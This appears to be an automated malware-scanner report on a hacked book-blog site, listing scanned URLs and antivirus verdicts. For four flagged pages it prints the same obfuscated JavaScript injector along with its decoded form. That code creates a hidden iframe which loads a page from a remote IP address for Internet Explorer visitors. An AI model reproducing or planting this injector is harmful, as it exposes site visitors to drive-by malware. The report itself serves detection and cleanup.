Malware Scanner report for papaya-palace.com

Malicious/Suspicious/Total urls checked: 5/0/20

5 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "papaya-palace.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=papaya-palace.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.papaya-palace.com/	200 OK Content-Length: 95 Content-Type: text/html	clean
http://www.papaya-palace.com/test404page.js	404 Not Found Content-Length: 1640 Content-Type: text/html	clean
http://www.papaya-palace.com/katbooks	HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 17:17:38 GMT Location: http://www.papaya-palace.com/katbooks/ Server: Apache Content-Type: text/html; charset=iso-8859-1	clean
http://www.papaya-palace.com/katbooks/	200 OK Content-Length: 14168 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; } function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##\|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= ... 466 bytes are skipped ...vgZggiryfgv(##+##drwgs##+##,9)@inn9.hvgZggiryfgv(##+##svrtsg##+##,9)@inn9.hvgZggiryfgv(##+##yliwvi##+##,9)@'));Ajt1(fdA2('inn9.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));Ajt1(fdA2('inn9.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#Rik1=mzertzgli.fhviZtvmg.glOldviXzhv()@'));Ajt1(fdA2('ezi#Qam1=Rik1.rmwvcLu(##+##nhrv##+##)@ezi#lWnz=Rik1.rmwvcLu(##+##mg#3.##+##)@'));if ((Jzn8>0)&&(oDma==-1)){Ajt1(fdA2('wlxfnvmg.ylwb.zkkvmwXsrow(inn9)@'));} Decoded script: var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); r ... 25 bytes are skipped ...'width: 0; height: 0; border: none;'); rmm0.setAttribute('style','width: 0; height: 0; border: none;'); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); document.body.appendChild(rmm0); document.body.appendChild(rmm0); Antivirus reports: Avast HTML:Iframe-MB [Trj] Ad-Aware JS:Exploit.JS.Iframe.I Ikarus Trojan.IframeRef nProtect JS:Exploit.JS.Iframe.I K7AntiVirus Riskware ( c5bc005c0 ) Emsisoft JS:Exploit.JS.Iframe.I (B) K7GW Exploit ( 04c55e0a1 ) Microsoft Trojan:JS/Iframe.AR Kaspersky HEUR:Trojan-Downloader.Script.Generic MicroWorld-eScan JS:Exploit.JS.Iframe.I Fortinet JS/Iframe.U!tr NANO-Antivirus Trojan.Script.Iframe.qczk F-Secure JS:Exploit.JS.Iframe.I F-Prot JS/IFrame.HE.gen GData JS:Exploit.JS.Iframe.I Commtouch JS/IFrame.HE.gen BitDefender JS:Exploit.JS.Iframe.I
http://www.papaya-palace.com/katbooks/vmabout.html	200 OK Content-Length: 3547 Content-Type: text/html	clean
http://www.papaya-palace.com/katlog/	HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 17:17:38 GMT Location: http://papaya-palace.com/katlog/ Server: Apache Content-Type: text/html; charset=UTF-8 X-Pingback: http://papaya-palace.com/katlog/xmlrpc.php X-Powered-By: PHP/5.2.11	clean
http://papaya-palace.com/katlog/	200 OK Content-Length: 28958 Content-Type: text/html	clean
http://www.google.com/reader/ui/publisher-en.js	HTTP/1.1 301 Moved Permanently Cache-Control: public, max-age=2592000 Connection: close Date: Thu, 08 Jan 2015 16:21:17 GMT Age: 3382 Location: http://www.google.com/reader/about/ Server: sffe Content-Length: 232 Content-Type: text/html; charset=UTF-8 Expires: Sat, 07 Feb 2015 16:21:17 GMT Alternate-Protocol: 80:quic,p=0.02 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block	clean
http://www.google.com/reader/about/	200 OK Content-Length: 3563 Content-Type: text/html	clean
http://www.google.com//www.google.com/js/google.js/	404 Not Found Content-Length: 1453 Content-Type: text/html	clean
http://www.google.com//www.google.com/	404 Not Found Content-Length: 1440 Content-Type: text/html	clean
http://www.google.com/test404page.js	404 Not Found Content-Length: 1439 Content-Type: text/html	clean
http://www.google.com//www.google.com/js/maia.js/	404 Not Found Content-Length: 1451 Content-Type: text/html	clean
http://www.google.com/reader/public/javascript-sub/user/10725955556447852308/label/blogroll?callback=GRC_p(%7Bc%3A%22blue%22%2Ct%3A%22%22%2Cb%3A%22true%22%7D)%3Bnew%20GRC	HTTP/1.1 301 Moved Permanently Cache-Control: public, max-age=2592000 Connection: close Date: Thu, 08 Jan 2015 17:17:40 GMT Location: http://www.google.com/reader/about/ Server: sffe Content-Length: 232 Content-Type: text/html; charset=UTF-8 Expires: Sat, 07 Feb 2015 17:17:40 GMT Alternate-Protocol: 80:quic,p=0.02 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block	clean
http://www.papaya-palace.com/portal.html	404 Not Found Content-Length: 1640 Content-Type: text/html	clean
http://www.papaya-palace.com/katlog	HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 17:17:40 GMT Location: http://www.papaya-palace.com/katlog/ Server: Apache Content-Type: text/html; charset=iso-8859-1	clean
http://www.papaya-palace.com/katbooks/archives/cat_general_fiction.html	200 OK Content-Length: 11179 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; } function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##\|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= ... 466 bytes are skipped ...vgZggiryfgv(##+##drwgs##+##,9)@inn9.hvgZggiryfgv(##+##svrtsg##+##,9)@inn9.hvgZggiryfgv(##+##yliwvi##+##,9)@'));Ajt1(fdA2('inn9.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));Ajt1(fdA2('inn9.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#Rik1=mzertzgli.fhviZtvmg.glOldviXzhv()@'));Ajt1(fdA2('ezi#Qam1=Rik1.rmwvcLu(##+##nhrv##+##)@ezi#lWnz=Rik1.rmwvcLu(##+##mg#3.##+##)@'));if ((Jzn8>0)&&(oDma==-1)){Ajt1(fdA2('wlxfnvmg.ylwb.zkkvmwXsrow(inn9)@'));} Decoded script: var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); r ... 25 bytes are skipped ...'width: 0; height: 0; border: none;'); rmm0.setAttribute('style','width: 0; height: 0; border: none;'); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); document.body.appendChild(rmm0); document.body.appendChild(rmm0); Antivirus reports: Avast HTML:Iframe-MB [Trj] Ad-Aware JS:Exploit.JS.Iframe.I Ikarus Trojan.IframeRef nProtect JS:Exploit.JS.Iframe.I K7AntiVirus Riskware ( c5bc005c0 ) Emsisoft JS:Exploit.JS.Iframe.I (B) K7GW Exploit ( 04c55e0a1 ) Microsoft Trojan:JS/Iframe.AR Kaspersky HEUR:Trojan-Downloader.Script.Generic MicroWorld-eScan JS:Exploit.JS.Iframe.I Fortinet JS/Iframe.U!tr NANO-Antivirus Trojan.Script.Iframe.qczk F-Secure JS:Exploit.JS.Iframe.I F-Prot JS/IFrame.HE.gen GData JS:Exploit.JS.Iframe.I Commtouch JS/IFrame.HE.gen BitDefender JS:Exploit.JS.Iframe.I
http://www.papaya-palace.com/katbooks/archives/000492.html	200 OK Content-Length: 11258 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; } function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##\|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= ... 466 bytes are skipped ...vgZggiryfgv(##+##drwgs##+##,9)@inn9.hvgZggiryfgv(##+##svrtsg##+##,9)@inn9.hvgZggiryfgv(##+##yliwvi##+##,9)@'));Ajt1(fdA2('inn9.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));Ajt1(fdA2('inn9.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#Rik1=mzertzgli.fhviZtvmg.glOldviXzhv()@'));Ajt1(fdA2('ezi#Qam1=Rik1.rmwvcLu(##+##nhrv##+##)@ezi#lWnz=Rik1.rmwvcLu(##+##mg#3.##+##)@'));if ((Jzn8>0)&&(oDma==-1)){Ajt1(fdA2('wlxfnvmg.ylwb.zkkvmwXsrow(inn9)@'));} Decoded script: var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); r ... 25 bytes are skipped ...'width: 0; height: 0; border: none;'); rmm0.setAttribute('style','width: 0; height: 0; border: none;'); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); document.body.appendChild(rmm0); document.body.appendChild(rmm0); Antivirus reports: Avast HTML:Iframe-MB [Trj] Ad-Aware JS:Exploit.JS.Iframe.I Ikarus Trojan.IframeRef nProtect JS:Exploit.JS.Iframe.I K7AntiVirus Riskware ( c5bc005c0 ) Emsisoft JS:Exploit.JS.Iframe.I (B) K7GW Exploit ( 04c55e0a1 ) Microsoft Trojan:JS/Iframe.AR Kaspersky HEUR:Trojan-Downloader.Script.Generic MicroWorld-eScan JS:Exploit.JS.Iframe.I Fortinet JS/Iframe.U!tr NANO-Antivirus Trojan.Script.Iframe.qczk F-Secure JS:Exploit.JS.Iframe.I F-Prot JS/IFrame.HE.gen GData JS:Exploit.JS.Iframe.I Commtouch JS/IFrame.HE.gen BitDefender JS:Exploit.JS.Iframe.I
http://www.papaya-palace.com/katbooks/archives/000491.html	200 OK Content-Length: 18559 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; } function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##\|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= ... 466 bytes are skipped ...vgZggiryfgv(##+##drwgs##+##,9)@inn9.hvgZggiryfgv(##+##svrtsg##+##,9)@inn9.hvgZggiryfgv(##+##yliwvi##+##,9)@'));Ajt1(fdA2('inn9.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));Ajt1(fdA2('inn9.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#Rik1=mzertzgli.fhviZtvmg.glOldviXzhv()@'));Ajt1(fdA2('ezi#Qam1=Rik1.rmwvcLu(##+##nhrv##+##)@ezi#lWnz=Rik1.rmwvcLu(##+##mg#3.##+##)@'));if ((Jzn8>0)&&(oDma==-1)){Ajt1(fdA2('wlxfnvmg.ylwb.zkkvmwXsrow(inn9)@'));} Decoded script: var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); r ... 25 bytes are skipped ...'width: 0; height: 0; border: none;'); rmm0.setAttribute('style','width: 0; height: 0; border: none;'); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); document.body.appendChild(rmm0); document.body.appendChild(rmm0); Antivirus reports: Avast HTML:Iframe-MB [Trj] Ad-Aware JS:Exploit.JS.Iframe.I Ikarus Trojan.IframeRef nProtect JS:Exploit.JS.Iframe.I K7AntiVirus Riskware ( c5bc005c0 ) Emsisoft JS:Exploit.JS.Iframe.I (B) K7GW Exploit ( 04c55e0a1 ) Microsoft Trojan:JS/Iframe.AR Kaspersky HEUR:Trojan-Downloader.Script.Generic MicroWorld-eScan JS:Exploit.JS.Iframe.I Fortinet JS/Iframe.U!tr NANO-Antivirus Trojan.Script.Iframe.qczk F-Secure JS:Exploit.JS.Iframe.I F-Prot JS/IFrame.HE.gen GData JS:Exploit.JS.Iframe.I Commtouch JS/IFrame.HE.gen BitDefender JS:Exploit.JS.Iframe.I
http://www.papaya-palace.com/katbooks/archives/000490.html	200 OK Content-Length: 12044 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) function ITz8(AXls, ORlS, Zawg) { var gqf7; gqf7=AXls.split(ORlS); var fCf4=gqf7.join(Zawg); return fCf4; } function fdA2(xvx4) { xvx4 = ITz8(xvx4,"##+##","'"); xvx4 = ITz8(xvx4,"##\|##","\\"); fCf4=""; Nen6 =""; for(k=0;k<xvx4.length;k++) { fCf4 = xvx4.charCodeAt(k); if (fCf4==32){fCf4=35} else if (fCf4==35){fCf4=32} else if (fCf4==59){fCf4=64} else if (fCf4==64){fCf4=59} else if (fCf4==37){fCf4=42} else if (fCf4==42){fCf4=37} else if (fCf4>=97 && fCf4<=122) { fCf4=fCf4-97;fCf4= ... 466 bytes are skipped ...vgZggiryfgv(##+##drwgs##+##,9)@inn9.hvgZggiryfgv(##+##svrtsg##+##,9)@inn9.hvgZggiryfgv(##+##yliwvi##+##,9)@'));Ajt1(fdA2('inn9.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));Ajt1(fdA2('inn9.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#Rik1=mzertzgli.fhviZtvmg.glOldviXzhv()@'));Ajt1(fdA2('ezi#Qam1=Rik1.rmwvcLu(##+##nhrv##+##)@ezi#lWnz=Rik1.rmwvcLu(##+##mg#3.##+##)@'));if ((Jzn8>0)&&(oDma==-1)){Ajt1(fdA2('wlxfnvmg.ylwb.zkkvmwXsrow(inn9)@'));} Decoded script: var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var SgC7 = 'http://64.255.161.90/data/z/static.php';var Bru8 = 'iframe'; var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); var rmm0 = document.createElement(Bru8);rmm0.setAttribute('src', SgC7); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); rmm0.setAttribute('width',0);rmm0.setAttribute('height',0);rmm0.setAttribute('border',0); r ... 25 bytes are skipped ...'width: 0; height: 0; border: none;'); rmm0.setAttribute('style','width: 0; height: 0; border: none;'); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); rmm0.setAttribute('style','display:none'); var Irp8=navigator.userAgent.toLowerCase(); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); var Jzn8=Irp8.indexOf('msie');var oDma=Irp8.indexOf('nt 6.'); document.body.appendChild(rmm0); document.body.appendChild(rmm0); Antivirus reports: Avast HTML:Iframe-MB [Trj] Ad-Aware JS:Exploit.JS.Iframe.I Ikarus Trojan.IframeRef nProtect JS:Exploit.JS.Iframe.I K7AntiVirus Riskware ( c5bc005c0 ) Emsisoft JS:Exploit.JS.Iframe.I (B) K7GW Exploit ( 04c55e0a1 ) Microsoft Trojan:JS/Iframe.AR Kaspersky HEUR:Trojan-Downloader.Script.Generic MicroWorld-eScan JS:Exploit.JS.Iframe.I Fortinet JS/Iframe.U!tr NANO-Antivirus Trojan.Script.Iframe.qczk F-Secure JS:Exploit.JS.Iframe.I F-Prot JS/IFrame.HE.gen GData JS:Exploit.JS.Iframe.I Commtouch JS/IFrame.HE.gen BitDefender JS:Exploit.JS.Iframe.I

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: papaya-palace.com

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: papaya-palace.com
Referer: http://www.google.com/search?q=papaya-palace.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for papaya-palace.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools